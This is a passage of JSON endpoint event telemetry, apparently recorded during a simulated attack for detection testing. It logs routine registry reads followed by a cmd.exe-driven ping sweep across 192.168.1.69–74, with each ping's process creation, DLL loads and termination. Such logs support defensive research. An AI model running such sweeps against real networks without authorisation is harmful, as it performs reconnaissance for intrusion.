"registry_value": "SOFTWARE", - "timestamp": 131883572314170000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883572314170000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": "Input", - "timestamp": 131883572314170000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": 
"C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883572315420000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 5824, - "process_name": "SearchIndexer.exe", - "process_path": "C:\\WINDOWS\\system32\\SearchIndexer.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex\\NewClientID", - "registry_value": "NewClientID", - "timestamp": 131883572315580000, - "unique_pid": "{42FC7E13-B303-5C05-0000-0010823E0600}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo\\C9DD546D-51CE-5F51-47F7-F7BA79663637", - "registry_value": "C9DD546D-51CE-5F51-47F7-F7BA79663637", - "timestamp": 131883572315580000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000002E021A", - 
"registry_value": "W32:00000000002E021A", - "timestamp": 131883572316050000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000002E021A", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000002E021A\\VirtualDesktop", - "registry_value": "VirtualDesktop", - "timestamp": 131883572316050000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "process", - "pid": 5260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572316840000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.69", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7640, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572316990000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572316980000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" - }, - { - "event_type": "image_load", - "image_name": 
"ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572316980000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572316980000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572316980000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572316980000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572316980000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572316980000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7640, - "process_name": "PING.EXE", - 
"process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572316980000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572316980000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572316980000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572316980000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" - }, - { - "event_type": "process", - "pid": 7640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572317450016, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.70", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1572, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572317560000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": 
"C:\\Windows\\System32\\PING.EXE", - "pid": 1572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572317450016, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572317450016, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572317450016, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572317450016, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572317450016, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572317450016, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1572, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572317450016, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572317450016, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572317610000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572317610000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572317610000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" - }, - { - "event_type": "process", - "pid": 1572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572321840000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.71", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5420, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 
131883572321980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5420, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572321980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5420, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572321980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5420, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572321980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5420, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572321980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5420, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572321980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5420, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572321980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5420, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572321980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5420, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572321980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5420, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572321980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5420, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572321980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5420, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572321980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" - }, - { - "event_type": "process", - "pid": 5420, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572326830000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.72", 
- "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4564, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572327000000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4564, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572326980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4564, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572326980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4564, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572326980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4564, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572326980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4564, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - 
"timestamp": 131883572326980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4564, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572326980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4564, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572326980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4564, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572326980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4564, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572326980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4564, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572326980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4564, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572326980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" - }, - { - "event_type": "process", - 
"pid": 4564, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572331990000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.73", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7992, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572332140000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572332140000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572332140000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572332140000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572332140000, - 
"unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572332140000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572332140000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572332140000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572332140000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572332140000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572332140000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - 
"image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572332140000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" - }, - { - "event_type": "process", - "pid": 7992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572336830000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.74", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1640, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572336970000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572336830000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572336830000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572336980000, - "unique_pid": 
"{42FC7E13-CB71-5C05-0000-001074345201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572336980000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572336980000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572336980000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572336980000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572336980000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572336980000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - 
